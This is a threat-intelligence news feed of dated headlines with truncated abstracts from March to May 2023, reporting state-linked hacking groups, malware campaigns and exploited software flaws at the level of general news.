May 03, 2023
Chinese Hacker Group Earth Longzhi Resurfaces with Advanced Malware Tactics Full Text
Abstract
A Chinese state-sponsored hacking outfit has resurfaced with a new campaign targeting government, healthcare, technology, and manufacturing entities based in Taiwan, Thailand, the Philippines, and Fiji after more than six months of no activity. Trend Micro attributed the intrusion set to a cyber espionage group it tracks under the name Earth Longzhi , which is a subgroup within APT41 (aka HOODOO or Winnti) and shares overlaps with various other clusters known as Earth Baku, SparklingGoblin, and GroupCC. Earth Longzhi was first documented by the cybersecurity firm in November 2022, detailing its attacks against various organizations located in East and Southeast Asia as well as Ukraine. Attack chains mounted by the threat actor leverage vulnerable public-facing applications as entry points to deploy the BEHINDER web shell , and then leverage that access to drop additional payloads, including a new variant of a Cobalt Strike loader called CroxLoader. "This recent campaThe Hacker News
May 3, 2023
Hackers are taking advantage of the interest in generative AI to install Malware Full Text
Abstract
Threat actors are using the promise of generative AI like ChatGPT to deliver malware, Facebook parent Meta warned. Threat actors are taking advantage of the huge interest in generative AI like ChatGPT to trick victims into installing malware, Meta...Security Affairs
May 02, 2023
North Korea’s ScarCruft Deploys RokRAT Malware via LNK File Infection Chains Full Text
Abstract
The North Korean threat actor known as ScarCruft started experimenting with oversized LNK files as a delivery route for RokRAT malware as early as July 2022, the same month Microsoft began blocking macros across Office documents by default. "RokRAT has not changed significantly over the years, but its deployment methods have evolved, now utilizing archives containing LNK files that initiate multi-stage infection chains," Check Point said in a new technical report. "This is another representation of a major trend in the threat landscape, where APTs and cybercriminals alike attempt to overcome the blocking of macros from untrusted sources." ScarCruft , also known by the names APT37, InkySquid, Nickel Foxcroft, Reaper, RedEyes, and Ricochet Chollima, is a threat group that almost exclusively targets South Korean individuals and entities as part of spear-phishing attacks designed to deliver an array of custom tools. The adversarial collective, unlike the LaThe Hacker News
May 01, 2023
Vietnamese Threat Actor Infects 500,000 Devices Using ‘Malverposting’ Tactics Full Text
Abstract
A Vietnamese threat actor has been attributed as behind a "malverposting" campaign on social media platforms to infect over 500,000 devices worldwide over the past three months to deliver variants of information stealers such as S1deload Stealer and SYS01stealer . Malverposting refers to the use of promoted social media posts on services like Facebook and Twitter to mass propagate malicious software and other security threats. The idea is to reach a broader audience by paying for ads to "amplify" their posts. According to Guardio Labs , such attacks commence with the adversary creating new business profiles and hijacking already popular accounts to serve ads that claim to offer free adult-rated photo album downloads. Within these ZIP archive files are purported images that are actually executable files, which, when clicked, activate the infection chain and ultimately deploy the stealer malware to siphon session cookies, account data, and other information.The Hacker News
April 30, 2023
White hat hackers showed how to take over a European Space Agency satellite Full Text
Abstract
Thales cybersecurity researchers have shown this week how they seized control of a European Space Agency (ESA) satellite. This week, during the third edition of CYSAT, the European event dedicated to cybersecurity for the space industry, the European...Security Affairs
April 26, 2023
Chinese Hackers Spotted Using Linux Variant of PingPull in Targeted Cyberattacks Full Text
Abstract
The Chinese nation-state group dubbed Alloy Taurus is using a Linux variant of a backdoor called PingPull as well as a new undocumented tool codenamed Sword2033. That's according to findings from Palo Alto Networks Unit 42, which discovered recent malicious cyber activity carried out by the group targeting South Africa and Nepal. Alloy Taurus is the constellation-themed moniker assigned to a threat actor that's known for its attacks targeting telecom companies since at least 2012. It's also tracked by Microsoft as Granite Typhoon (previously Gallium). Last month, the adversary was attributed to a campaign called Tainted Love targeting telecommunication providers in the Middle East as part of a broader operation referred to as Soft Cell. Recent cyber espionage attacks mounted by Alloy Taurus have also broadened their victimology footprint to include financial institutions and government entities. PingPull, first documented by Unit 42 in June 2022, is a remoteThe Hacker News
April 26, 2023
Chinese Hackers Using MgBot Malware to Target International NGOs in Mainland China Full Text
Abstract
The advanced persistent threat (APT) group referred to as Evasive Panda has been observed targeting an international non-governmental organization (NGO) in Mainland China with malware delivered via update channels of legitimate applications like Tencent QQ. The attack chains are designed to distribute a Windows installer for MgBot malware, ESET security researcher Facundo Muñoz said in a new report published today. The activity commenced in November 2020 and continued throughout 2021. Evasive Panda, also known as Bronze Highland and Daggerfly, is a Chinese-speaking APT group that has been attributed to a series of cyber espionage attacks targeting various entities in China, Hong Kong, and other countries located in East and South Asia since at least late December 2012. The group's hallmark is the use of the custom MgBot modular malware framework, which is capable of receiving additional components on the fly to expand on its intelligence-gathering capabilities. Some of thThe Hacker News
April 26, 2023
FIN7 Hackers Caught Exploiting Recent Veeam Backup & Replication Vulnerability Full Text
Abstract
At the end of March 2023, WithSecure caught FIN7 attacks that exploited internet-facing servers running Veeam Backup & Replication software to execute payloads on the compromised environment.Cyware
April 24, 2023
Russian Hackers Tomiris Targeting Central Asia for Intelligence Gathering Full Text
Abstract
The Russian-speaking threat actor behind a backdoor known as Tomiris is primarily focused on gathering intelligence in Central Asia, fresh findings from Kaspersky reveal. "Tomiris's endgame consistently appears to be the regular theft of internal documents," security researchers Pierre Delcher and Ivan Kwiatkowski said in an analysis published today. "The threat actor targets government and diplomatic entities in the CIS." The Russian cybersecurity firm's latest assessment is based on three new attack campaigns mounted by the hacking crew between 2021 and 2023. Tomiris first came to light in September 2021 when Kaspersky highlighted its potential connections to Nobelium (aka APT29, Cozy Bear, or Midnight Blizzard), the Russian nation-state group behind the SolarWinds supply chain attack. Similarities have also been unearthed between the backdoor and another malware strain dubbed Kazuar , which is attributed to the Turla group (aka Krypton, SecreThe Hacker News
April 24, 2023
Hackers Exploit Outdated WordPress Plugin to Backdoor Thousands of WordPress Sites Full Text
Abstract
Threat actors have been observed leveraging a legitimate but outdated WordPress plugin to surreptitiously backdoor websites as part of an ongoing campaign, Sucuri revealed in a report published last week. The plugin in question is Eval PHP, released by a developer named flashpixx. It allows users to insert PHP code pages and posts of WordPress sites that's then executed every time the posts are opened in a web browser. While Eval PHP has never received an update in 11 years, statistics gathered by WordPress show that it's installed on over 8,000 websites, with the number of downloads skyrocketing from one or two on average since September 2022 to 6,988 on March 30, 2023. On April 23, 2023, alone, it was downloaded 2,140 times. The plugin has racked up 23,110 downloads over the past seven days. GoDaddy-owned Sucuri said it observed some infected websites' databases injected with malicious code into the "wp_posts" table , which stores a site's posts,The Hacker News
April 24, 2023
Hackers can hack organizations using data found on their discarded enterprise network equipment Full Text
Abstract
ESET researchers explained that enterprise network equipment that was discarded, but not destroyed, could reveal corporate secrets. ESET researchers purchased a few used routers to set up a test environment and made a shocking discovery, in many cases,...Security Affairs
April 24, 2023
Russian Hackers Suspected in Ongoing Exploitation of Unpatched PaperCut Servers Full Text
Abstract
Print management software provider PaperCut said that it has "evidence to suggest that unpatched servers are being exploited in the wild," citing two vulnerability reports from cybersecurity company Trend Micro. "PaperCut has conducted analysis on all customer reports, and the earliest signature of suspicious activity on a customer server potentially linked to this vulnerability is 14th April 01:29 AEST / 13th April 15:29 UTC," it further added . The update comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a critical improper access control flaw ( CVE-2023-27350 , CVSS score: 9.8) in PaperCut MF and NG to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. Cybersecurity company Huntress, which found about 1,800 publicly exposed PaperCut servers, said it observed PowerShell commands being spawned from PaperCut software to install remote management and maintenance (RMM) software like Atera anThe Hacker News
April 24, 2023
North Korean Hackers Target Mac Users With New ‘RustBucket’ Malware Full Text
Abstract
Dubbed RustBucket and able to fetch additional payloads from its command-and-control (C&C) server, the malware has been attributed to the APT actor BlueNoroff, which is believed to be a subgroup of the infamous Lazarus hacking group.Cyware
April 24, 2023
Threat actors can use ChatGPT to sharpen cyberthreats, but no need to panic yet Full Text
Abstract
Since the generative artificial intelligence chatbot was released in November, Palo Alto Networks’ Unit 42 has detected up to 118 malicious URLs related to ChatGPT daily and domain squatting related to the tool has surged 17,818%.Cyware
April 24, 2023
Hackers Exploit Generative AI to Spread RedLine Stealer MaaS Full Text
Abstract
As generative AI tools like OpenAI ChatGPT and Google Bard continue to dominate the headlines—and pundits debate whether the technology has taken off too quickly without necessary guardrails—cybercriminals are showing no hesitance in exploiting them.Cyware
April 20, 2023
Hackers Storing Malware in Google Drive as Encrypted ZIP Files To Evade Detection Full Text
Abstract
Google’s Cybersecurity Action Team (GCAT) and Mandiant researched a list of techniques and methods used by threat actors over the period for penetrating the environments and other malicious activities.Cyware
April 19, 2023
Pakistani Hackers Use Linux Malware Poseidon to Target Indian Government Agencies Full Text
Abstract
The Pakistan-based advanced persistent threat (APT) actor known as Transparent Tribe used a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon. "Poseidon is a second-stage payload malware associated with Transparent Tribe," Uptycs security researcher Tejaswini Sandapolla said in a technical report published this week. "It is a general-purpose backdoor that provides attackers with a wide range of capabilities to hijack an infected host. Its functionalities include logging keystrokes, taking screen captures, uploading and downloading files, and remotely administering the system in various ways." Transparent Tribe is also tracked as APT36, Operation C-Major, PROJECTM, and Mythic Leopard, and has a track record of targeting Indian government organizations, military personnel, defense contractors, and educational entities. It has also repeatedly leveraged trojanized versions of KavacThe Hacker News
April 19, 2023
U.S. and U.K. Warn of Russian Hackers Exploiting Cisco Router Flaws for Espionage Full Text
Abstract
U.K. and U.S. cybersecurity and intelligence agencies have warned of Russian nation-state actors exploiting now-patched flaws in networking equipment from Cisco to conduct reconnaissance and deploy malware against targets. The intrusions , per the authorities, took place in 2021 and targeted a small number of entities in Europe, U.S. government institutions, and about 250 Ukrainian victims. The activity has been attributed to a threat actor tracked as APT28 , which is also known as Fancy Bear, Forest Blizzard (formerly Strontium), FROZENLAKE, and Sofacy, and is affiliated with the Russian General Staff Main Intelligence Directorate (GRU). "APT28 has been known to access vulnerable routers by using default and weak SNMP community strings, and by exploiting CVE-2017-6742," the National Cyber Security Centre (NCSC) said. CVE-2017-6742 (CVSS score: 8.8) is part of a set of remote code execution flaws that stem from a buffer overflow condition in the Simple Network MaThe Hacker News
April 19, 2023
Iranian Government-Backed Hackers Targeting U.S. Energy and Transit Systems Full Text
Abstract
An Iranian government-backed actor known as Mint Sandstorm has been linked to attacks aimed at critical infrastructure in the U.S. between late 2021 to mid-2022. "This Mint Sandstorm subgroup is technically and operationally mature, capable of developing bespoke tooling and quickly weaponizing N-day vulnerabilities, and has demonstrated agility in its operational focus, which appears to align with Iran's national priorities," the Microsoft Threat Intelligence team said in an analysis. Targeted entities consist of seaports, energy companies, transit systems, and a major U.S. utility and gas company. The activity is suspected to be retaliatory and in response to attacks targeting its maritime, railway , and gas station payment systems that took place between May 2020 and late 2021. It's worth noting here that Iran subsequently accused Israel and the U.S. of masterminding the attacks on the gas stations in a bid to create unrest in the nation. Mint SandstoThe Hacker News
April 18, 2023
Iranian Hackers Using SimpleHelp Remote Support Software for Persistent Access Full Text
Abstract
The Iranian threat actor known as MuddyWater is continuing its time-tested tradition of relying on legitimate remote administration tools to commandeer targeted systems. While the nation-state group has previously employed ScreenConnect, RemoteUtilities, and Syncro , a new analysis from Group-IB has revealed the adversary's use of the SimpleHelp remote support software in June 2022. MuddyWater, active since at least 2017, is assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS). Some of the top targets include Turkey, Pakistan, the U.A.E., Iraq, Israel, Saudi Arabia, Jordan, the U.S., Azerbaijan, and Afghanistan. "MuddyWater uses SimpleHelp, a legitimate remote device control and management tool, to ensure persistence on victim devices," Nikita Rostovtsev, senior threat analyst at Group-IB, said. "SimpleHelp is not compromised and is used as intended. The threat actors found a way to download the tool from the ofThe Hacker News
April 17, 2023
China-linked APT41 group spotted using open-source red teaming tool GC2 Full Text
Abstract
China-linked APT41 group used the open-source red teaming tool GC2 in an attack against a Taiwanese media organization. Google Threat Analysis Group (TAG) team reported that the China-linked APT41 group used the open-source red teaming tool Google...Security Affairs
April 15, 2023
Transparent Tribe Eyes Indian Education Sector Full Text
Abstract
SentinelLabs identified a campaign by the Transparent Tribe that targets the Indian education sector via education-themed malicious Office documents propagating Crimson RAT. The group has long been targeting different sectors in India. Hence, vigilance and robust cyber defense strategies are n ... Read MoreCyware
April 13, 2023
Pakistan-based Transparent Tribe Hackers Targeting Indian Educational Institutions Full Text
Abstract
The Transparent Tribe threat actor has been linked to a set of weaponized Microsoft Office documents in intrusions directed against the Indian education sector to deploy a continuously maintained piece of malware called Crimson RAT. While the suspected Pakistan-based threat group is known to target military and government entities in the country, the activities have since expanded to include the education vertical . The hacking group, also called APT36, Operation C-Major, PROJECTM, and Mythic Leopard, has been active as far back as 2013. Educational institutions have been at the receiving end of the adversary's attacks since late 2021. "Crimson RAT is a consistent staple in the group's malware arsenal the adversary uses in its campaigns," SentinelOne researcher Aleksandar Milenkoski said in a report shared with The Hacker News. The .NET malware has the functionality to exfiltrate files and system data to an actor-controlled server. It's also buiThe Hacker News
April 13, 2023
Lazarus Hacker Group Evolves Tactics, Tools, and Targets in DeathNote Campaign Full Text
Abstract
The North Korean threat actor known as the Lazarus Group has been observed shifting its focus and rapidly evolving its tools and tactics as part of a long-running campaign called DeathNote . While the nation-state adversary is known for persistently singling out the cryptocurrency sector, recent attacks have also targeted automotive, academic, and defense sectors in Eastern Europe and other parts of the world, in what's perceived as a "significant" pivot. "At this point, the actor switched all the decoy documents to job descriptions related to defense contractors and diplomatic services," Kaspersky researcher Seongsu Park said in an analysis published Wednesday. The deviation in targeting, along with the use of updated infection vectors, is said to have occurred in April 2020. It's worth noting that the DeathNote cluster is also tracked under the monikers Operation Dream Job or NukeSped . Google-owned Mandiant has also tied a subset of the activitThe Hacker News
April 10, 2023
Inside the sting operation to catch North Korean crypto hackers Full Text
Abstract
In late January, the hackers moved a fraction of their loot to a crypto account pegged to the dollar, temporarily relinquishing control of it. The investigators pounced, flagging the transaction to U.S. law enforcement officials to freeze the money.Cyware
April 8, 2023
Google: North Korea-Linked Hackers Target Subject Experts and Think Tanks Full Text
Abstract
Google’s TAG identified a new campaign by the North Korean ARCHIPELAGO threat cluster (aka APT43) targeting U.S. and South Korean governments, think tanks, military personnel, academics, policymakers, and researchers. Most notably, ARCHIPELAGO used fraudulent Google Chrome extensions in combination ... Read MoreCyware
April 05, 2023
Hackers Using Self-Extracting Archives Exploit for Stealthy Backdoor Attacks Full Text
Abstract
An unknown threat actor used a malicious self-extracting archive ( SFX ) file in an attempt to establish persistent backdoor access to a victim's environment, new findings from CrowdStrike show. SFX files are capable of extracting the data contained within them without the need for dedicated software to display the file contents. It achieves this by including a decompressor stub, a piece of code that's executed to unpack the archive. "However, SFX archive files can also contain hidden malicious functionality that may not be immediately visible to the file's recipient, and could be missed by technology-based detections alone," CrowdStrike researcher Jai Minton said . In the case investigated by the cybersecurity firm, compromised credentials to a system were used to run a legitimate Windows accessibility application called Utility Manager (utilman.exe) and subsequently launch a password-protected SFX file. This, in turn, is made possible by configuring a deThe Hacker News
April 5, 2023
Hackers can Remotely Open Smart Garage Doors Across the World Full Text
Abstract
A security researcher found a series of vulnerabilities with the Nexx brand of smart garage openers. He says he could remotely find garages to target, and then open them across the internet.Cyware
April 01, 2023
Hackers Exploiting WordPress Elementor Pro Vulnerability: Millions of Sites at Risk! Full Text
Abstract
Unknown threat actors are actively exploiting a recently patched security vulnerability in the Elementor Pro website builder plugin for WordPress. The flaw, described as a case of broken access control, impacts versions 3.11.6 and earlier. It was addressed by the plugin maintainers in version 3.11.7 released on March 22. "Improved code security enforcement in WooCommerce components," the Elementor said in its release notes. The premium plugin is estimated to be used on over 12 million sites. Successful exploitation of the high-severity flaw allows an authenticated attacker to complete a takeover of a WordPress site that has WooCommerce enabled. "This makes it possible for a malicious user to turn on the registration page (if disabled) and set the default user role to administrator so they can create an account that instantly has the administrator privileges," Patchstack said in an alert of March 30, 2023. "After this, they are likely to either rediThe Hacker News
March 30, 2023
Chinese RedGolf Group Targeting Windows and Linux Systems with KEYPLUG Backdoor Full Text
Abstract
A Chinese state-sponsored threat activity group tracked as RedGolf has been attributed to the use of a custom Windows and Linux backdoor called KEYPLUG. "RedGolf is a particularly prolific Chinese state-sponsored threat actor group that has likely been active for many years against a wide range of industries globally," Recorded Future told The Hacker News. "The group has shown the ability to rapidly weaponize newly reported vulnerabilities (e.g. Log4Shell and ProxyLogon ) and has a history of developing and using a large range of custom malware families." The use of KEYPLUG by Chinese threat actors was first disclosed by Google-owned Manidant in March 2022 in attacks targeting multiple U.S. state government networks between May 2021 and February 2022. Then in October 2022, Malwarebytes detailed a separate set of attacks targeting government entities in Sri Lanka in early August that leveraged a novel implant dubbed DBoxAgent to deploy KEYPLUG. BotThe Hacker News
March 29, 2023
Hackers Distribute MacStealer MaaS to Target Mac Users Full Text
Abstract
MacStealer is a new information-stealing malware threat attempting to pilfer sensitive information from compromised macOS devices. The malware uses Telegram as its C2 channel and specifically affects devices running Catalina and later versions on M1 and M2 CPUs. It can harvest documents, browser co ... Read MoreCyware
March 27, 2023
REF2924 Brings a New Weapon NAPLISTENER to the Table Full Text
Abstract
The REF2924 threat cluster was observed dropping a previously-unseen malware, dubbed NAPLISTENER, on entities in Southeast and South Asia. The malware evades network-based forms of detection. Actors target Microsoft Exchange Servers exposed to the internet to deploy several backdoors, includin ... Read MoreCyware
March 24, 2023
China-linked hackers target telecommunication providers in the Middle East Full Text
Abstract
Researchers reported that China-linked hackers targeted telecommunication providers in the Middle East in the first quarter of 2023. In the first quarter of 2023, SentinelLabs researchers spotted the initial phases of attacks against telecommunication...Security Affairs
March 24, 2023
Russian Hackers Deploy New AresLoader Malware via Decoy Installers Full Text
Abstract
The malicious program appears to be developed and used by several members of a pro-Russia hacktivist group and is typically distributed inside decoy installers for legitimate software.Cyware
March 24, 2023
Researchers Uncover Chinese Nation State Hackers’ Deceptive Attack Strategies Full Text
Abstract
A recent campaign undertaken by Earth Preta indicates that nation-state groups aligned with China are getting increasingly proficient at bypassing security solutions. The threat actor , active since at least 2012, is tracked by the broader cybersecurity community under Bronze President, HoneyMyte, Mustang Panda, RedDelta, and Red Lich. Attack chains mounted by the group commence with a spear-phishing email to deploy a wide range of tools for backdoor access, command-and-control (C2), and data exfiltration. These messages come bearing with malicious lure archives distributed via Dropbox or Google Drive links that employ DLL side-loading, LNK shortcut files, and fake file extensions as arrival vectors to obtain a foothold and drop backdoors like TONEINS, TONESHELL, PUBLOAD , and MQsTTang (aka QMAGENT). Similar infection chains utilizing Google Drive links have been observed delivering Cobalt Strike as early as April 2021. "Earth Preta tends to hide malicious payloadsThe Hacker News
March 23, 2023
German and South Korean Agencies Warn of Kimsuky’s Expanding Cyber Attack Tactics Full Text
Abstract
German and South Korean government agencies have warned about cyber attacks mounted by a threat actor tracked as Kimsuky using rogue browser extensions to steal users' Gmail inboxes. The joint advisory comes from Germany's domestic intelligence apparatus, the Federal Office for the Protection of the Constitution (BfV), and South Korea's National Intelligence Service of the Republic of Korea (NIS). The intrusions are designed to strike "experts on the Korean Peninsula and North Korea issues" through spear-phishing campaigns, the agencies noted. Kimsuky , also known Black Banshee, Thallium, and Velvet Chollima, refers to a subordinate element within North Korea's Reconnaissance General Bureau and is known to "collect strategic intelligence on geopolitical events and negotiations affecting the DPRK's interests." Primary targets of interest include entities in the U.S. and South Korea, particularly singling out individuals working withinThe Hacker News
March 20, 2023
Threat actors abuse Adobe Acrobat Sign to distribute RedLine info-stealer Full Text
Abstract
Threat actors are abusing the legitimate Adobe Acrobat Sign service to distribute the RedLine information stealer. Avast researchers reported that threat actors are abusing the legitimate Adobe Acrobat Sign service to distribute the RedLine information...Security Affairs
March 18, 2023
Chinese Hackers Exploit Fortinet Zero-Day Flaw for Cyber Espionage Attack Full Text
Abstract
The zero-day exploitation of a now-patched medium-severity security flaw in the Fortinet FortiOS operating system has been linked to a suspected Chinese hacking group. Threat intelligence firm Mandiant, which made the attribution, said the activity cluster is part of a broader campaign designed to deploy backdoors onto Fortinet and VMware solutions and maintain persistent access to victim environments. The Google-owned threat intelligence and incident response firm is tracking the malicious operation under its uncategorized moniker UNC3886 , a China-nexus threat actor. "UNC3886 is an advanced cyber espionage group with unique capabilities in how they operate on-network as well as the tools they utilize in their campaigns," Mandiant researchers said in a technical analysis. "UNC3886 has been observed targeting firewall and virtualization technologies which lack EDR support. Their ability to manipulate firewall firmware and exploit a zero-day indicates they haveThe Hacker News
March 18, 2023
Chinese Hackers Targeting Security and Network Appliances With Custom Backdoors Full Text
Abstract
Chinese hackers exploited a critical Fortinet bug and used custom networking malware to steal credentials and maintain network access, according to Mandiant. Victims include defense, telecom, and technology firms, as well as government agencies.Cyware
March 16, 2023
Chinese and Russian Hackers Using SILKLOADER Malware to Evade Detection Full Text
Abstract
Threat activity clusters affiliated with the Chinese and Russian cybercriminal ecosystems have been observed using a new piece of malware that's designed to load Cobalt Strike onto infected machines. Dubbed SILKLOADER by Finnish cybersecurity company WithSecure, the malware leverages DLL side-loading techniques to deliver commercial adversary simulation software. The development comes as improved detection capabilities against Cobalt Strike, a legitimate post-exploitation tool used for red team operations, is forcing threat actors to seek alternative options or concoct new ways to propagate the framework to evade detection. "The most common of these include adding complexity to the auto-generated beacon or stager payloads via the utilization of packers, crypters, loaders, or similar techniques," WithSecure researchers said . SILKLOADER joins other loaders such as KoboldLoader, MagnetLoader, and LithiumLoader that have been recently discovered incorporatingThe Hacker News
March 16, 2023
Hackers Use AI-Generated YouTube Videos to Spread Info-stealers Full Text
Abstract
CloudSEK witnessed a 200-300% month-on-month surge in AI-generated YouTube videos about software cracks containing malicious links to a variety of stealer malware such as Raccoon, RedLine, and Vidar. To make the videos appear at the top of the results, threat actors employ SEO poisoning techniques. ... Read MoreCyware
March 15, 2023
YoroTrooper Stealing Credentials and Information from Government and Energy Organizations Full Text
Abstract
A previously undocumented threat actor dubbed YoroTrooper has been targeting government, energy, and international organizations across Europe as part of a cyber espionage campaign that has been active since at least June 2022. "Information stolen from successful compromises include credentials from multiple applications, browser histories and cookies, system information and screenshots," Cisco Talos researchers Asheer Malhotra and Vitor Ventura said in a Tuesday analysis. Prominent countries targeted include Azerbaijan, Tajikistan, Kyrgyzstan, Turkmenistan, and other Commonwealth of Independent States (CIS) nations. The threat actor is believed to be Russian-speaking owing to the victimology patterns and the presence of Cyrillic snippets in some of the implants. That said, the YoroTrooper intrusion set has been found to exhibit tactical overlaps with the PoetRAT team that was documented in 2020 as leveraging coronavirus-themed baits to strike government and eneThe Hacker News
March 14, 2023
Pro-Russian Hackers Blackmail Ukrainian Developer of S.T.A.L.K.E.R. 2 Game Full Text
Abstract
GSC Game World says it has been enduring cyberattacks for ‘more than a year’ and that hackers demand Russia-friendly changes to the game or else they’ll leak tons of the game’s development materials.Cyware
March 13, 2023
China-linked Hackers Abuse SonicWall SMA Devices Full Text
Abstract
UNC4540, a China-linked cybercriminal group, was observed deploying a custom backdoor on a SonicWall SMA appliance. Attackers show a thorough understanding of the appliance and use a set of malicious files to obtain privileges. The malware is capable of extracting credentials, achieving persistence ... Read MoreCyware
March 12, 2023
8220 Gang Uses New ScrubCrypt Crypter to Evade Detection Full Text
Abstract
Chinese 8220 Gang deployed the new ScrubCrypt payload exploiting an Oracle Weblogic Server in a specific URI between January and February 2023, revealed security experts at Fortinet. The ScrubCrypt crypter allows a hacker to secure applications with a unique BAT packing technique. It was found to b ... Read MoreCyware
March 10, 2023
IceFire Operators Introduces Linux Variant, Abuse IBM Flaw Full Text
Abstract
Media and entertainment sector organizations worldwide are under attack by the threat actor using the Linux version of the IceFire ransomware. SentinelLabs first made this observation and found that criminals abused a deserialization bug in IBM Aspera Faspex file sharing software, tracked as CVE-20 ... Read MoreCyware
March 10, 2023
China-linked Hackers Targeting Unpatched SonicWall SMA Devices with Malware Full Text
Abstract
A suspecting China-linked hacking campaign has been observed targeting unpatched SonicWall Secure Mobile Access (SMA) 100 appliances to drop malware and establish long-term persistence. "The malware has functionality to steal user credentials, provide shell access, and persist through firmware upgrades," cybersecurity company Mandiant said in a technical report published this week. The Google-owned incident response and threat intelligence firm is tracking the activity under its uncategorized moniker UNC4540 . The malware – a collection of bash scripts and a single ELF binary identified as a TinyShell backdoor – is engineered to grant the attacker privileged access to SonicWall devices. The overall objective behind the custom toolset appears to be credential theft, with the malware permitting the adversary to siphon cryptographically hashed credentials from all logged-in users. It further provides shell access to the compromised device. Mandiant also called out thThe Hacker News
March 10, 2023
North Korean UNC2970 Hackers Expands Operations with New Malware Families Full Text
Abstract
A North Korean espionage group tracked as UNC2970 has been observed employing previously undocumented malware families as part of a spear-phishing campaign targeting U.S. and European media and technology organizations since June 2022. Google-owned Mandiant said the threat cluster shares "multiple overlaps" with a long-running operation dubbed " Dream Job " that employs job recruitment lures in email messages to trigger the infection sequence. UNC2970 is the new moniker designated by the threat intelligence firm to a set of North Korean cyber activity that maps to UNC577 (aka Temp.Hermit ), and which also comprises another nascent threat cluster tracked as UNC4034. The UNC4034 activity, as documented by Mandiant in September 2022, entailed the use of WhatsApp to socially engineer targets into downloading a backdoor called AIRDRY.V2 under the pretext of sharing a skills assessment test. "UNC2970 has a concerted effort towards obfuscation and empThe Hacker News
March 09, 2023
Hackers Exploiting Remote Desktop Software Flaws to Deploy PlugX Malware Full Text
Abstract
Security vulnerabilities in remote desktop programs such as Sunlogin and AweSun are being exploited by threat actors to deploy the PlugX malware. AhnLab Security Emergency Response Center (ASEC), in a new analysis , said it marks the continued abuse of the flaws to deliver a variety of payloads on compromised systems. This includes the Sliver post-exploitation framework, XMRig cryptocurrency miner, Gh0st RAT, and Paradise ransomware. PlugX is the latest addition to this list. The modular malware has been extensively put to use by threat actors based in China, with new features continuously added to help perform system control and information theft. In the attacks observed by ASEC, successful exploitation of the flaws is followed by the execution of a PowerShell command that retrieves an executable and a DLL file from a remote server. This executable is a legitimate HTTP Server Service from cybersecurity company ESET, which is used to load the DLL file by means of a techniqThe Hacker News
March 9, 2023
Iran-linked hackers used fake Atlantic Council-affiliated persona to target human rights researchers Full Text
Abstract
It’s not clear if this particular persona’s efforts resulted in any successful phishing attacks. The Twitter account, created in October 2022, remains active. An Instagram account associated with the name is unavailable.Cyware
March 09, 2023
Iranian Hackers Target Women Involved in Human Rights and Middle East Politics Full Text
Abstract
Iranian state-sponsored actors are continuing to engage in social engineering campaigns targeting researchers by impersonating a U.S. think tank. "Notably the targets in this instance were all women who are actively involved in political affairs and human rights in the Middle East region," Secureworks Counter Threat Unit (CTU) said in a report shared with The Hacker News. The cybersecurity company attributed the activity to a hacking group it tracks as Cobalt Illusion , and which is also known by the names APT35, Charming Kitten, ITG18, Phosphorus, TA453, and Yellow Garuda. The targeting of academics, activists, diplomats, journalists, politicians, and researchers by the threat actor has been well-documented over the years . The group is suspected to be operating on behalf of Iran's Islamic Revolutionary Guard Corps (IRGC) and has exhibited a pattern of using fake personas to establish contact with individuals who are of strategic interest to the governmenThe Hacker News
March 9, 2023
Russian TA499 Targets North American and European Countries Full Text
Abstract
Russia-linked TA499 threat actor has been aggressively conducting email campaigns to target high-profile European and North American government authorities and CEOs of reputable organizations. The attack begins with an email or phone call, masquerading as prominent political figures. The phone call ... Read MoreCyware
March 8, 2023
Sharp Panda Targets Southeast Asian Governments Using Evolved Soul Malware Framework Full Text
Abstract
It uses spear-phishing emails for initial access, carrying malicious documents with government-themed lures. It further deploys the RoyalRoad RTF kit, allowing attackers to exploit older vulnerabilities for further infection.Cyware
March 07, 2023
Transparent Tribe Hackers Distribute CapraRAT via Trojanized Messaging Apps Full Text
Abstract
A suspected Pakistan-aligned advanced persistent threat (APT) group known as Transparent Tribe has been linked to an ongoing cyber espionage campaign targeting Indian and Pakistani Android users with a backdoor called CapraRAT . "Transparent Tribe distributed the Android CapraRAT backdoor via trojanized secure messaging and calling apps branded as MeetsApp and MeetUp," ESET said in a report shared with The Hacker News. As many as 150 victims, likely with military or political leanings, are estimated to have been targeted, with the malware ( com.meetup.app ) available to download from fake websites that masquerade as the official distribution centers of these apps. It's being suspected that the targets are lured through a honeytrap romance scam wherein the threat actor approaches the victims via another platform and persuades them to install the malware-laced apps under the pretext of "secure" messaging and calling. However, the apps, besides offeringThe Hacker News
March 7, 2023
Transparent Tribe Lures Indian and Pakistani Officials With Romance Scam to Spread Malware Full Text
Abstract
ESET researchers have identified an active Transparent Tribe campaign, targeting mostly Indian and Pakistani Android users – presumably with a military or political orientation.Cyware
March 03, 2023
Chinese Hackers Targeting European Entities with New MQsTTang Backdoor Full Text
Abstract
The China-aligned Mustang Panda actor has been observed using a hitherto unseen custom backdoor called MQsTTang as part of an ongoing social engineering campaign that commenced in January 2023. "Unlike most of the group's malware, MQsTTang doesn't seem to be based on existing families or publicly available projects," ESET researcher Alexandre Côté Cyr said in a new report. Attack chains orchestrated by the group have stepped up targeting of European entities in the wake of Russia's full-scale invasion of Ukraine last year. The victimology of the current activity is unclear, but the Slovak cybersecurity company said the decoy filenames are in line with the group's previous campaigns that target European political organizations. That said, ESET also observed attacks against unknown entities in Bulgaria and Australia, as well as a governmental institution in Taiwan, indicating focus on Europe and Asia. Mustang Panda has a history of using a remoteThe Hacker News
March 02, 2023
Hackers Exploit Containerized Environments to Steals Proprietary Data and Software Full Text
Abstract
A sophisticated attack campaign dubbed SCARLETEEL is targeting containerized environments to perpetrate theft of proprietary data and software. "The attacker exploited a containerized workload and then leveraged it to perform privilege escalation into an AWS account in order to steal proprietary software and credentials," Sysdig said in a new report. The advanced cloud attack also entailed the deployment of crypto miner software, which the cybersecurity company said is either an attempt to generate illicit profits or a ploy to distract defenders and throw them off the trail. The initial infection vector banked on exploiting a vulnerable public-facing service in a self-managed Kubernetes cluster hosted on Amazon Web Services (AWS). Upon gaining a successful foothold, an XMRig crypto miner was launched and a bash script was used to obtain credentials that could be used to further burrow into the AWS cloud infrastructure and exfiltrate sensitive data. "Either cryThe Hacker News
March 2, 2023
Blackfly: Espionage Group Targets Materials Technology Full Text
Abstract
